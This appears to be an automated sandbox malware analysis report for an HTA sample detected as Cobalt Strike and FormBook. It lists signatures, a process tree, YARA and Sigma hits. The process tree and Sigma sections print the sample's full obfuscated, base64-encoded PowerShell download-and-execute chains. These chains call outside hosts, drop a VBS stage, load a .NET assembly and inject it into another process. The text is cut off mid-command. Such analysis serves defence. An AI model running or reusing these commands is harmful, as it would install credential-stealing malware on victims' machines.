Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta

Overview

General Information

Sample name:maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta
Analysis ID:1568883
MD5:7b5d04515a8b84877cd75427ec392b85
SHA1:6013f960a5832b92b2ee8347c208761dc0a24d58
SHA256:e639ef803c3d793f9f0f3a9e4bca874b78e278f9be248103b7a691dbbfbf7b69
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, FormBook, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 5440 cmdline: mshta.exe "C:\Users\user\Desktop\maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 4460 cmdline: "C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2872 cmdline: POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 1492 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 3472 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5695.tmp" "c:\Users\user\AppData\Local\Temp\dtaz5slk\CSCC90739EC0644DC2B3B75DC9F86B7B59.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 3360 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 5988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenista MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • aspnet_compiler.exe (PID: 2720 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
              • lSomfUdjbC.exe (PID: 3992 cmdline: "C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • ieUnatt.exe (PID: 3360 cmdline: "C:\Windows\SysWOW64\ieUnatt.exe" MD5: 4E9919DF2EF531B389ABAEFD35AD546E)
          • firefox.exe (PID: 5668 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13c4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x13c4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          Click to see the 13 entries
          SourceRuleDescriptionAuthorStrings
          11.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            11.2.aspnet_compiler.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            11.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              11.2.aspnet_compiler.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x2dc43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x15f42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              SourceRuleDescriptionAuthorStrings
              amsi32_5988.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_5988.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenista, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJS
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS" , ProcessId: 3360, ProcessName: wscript.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenista, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 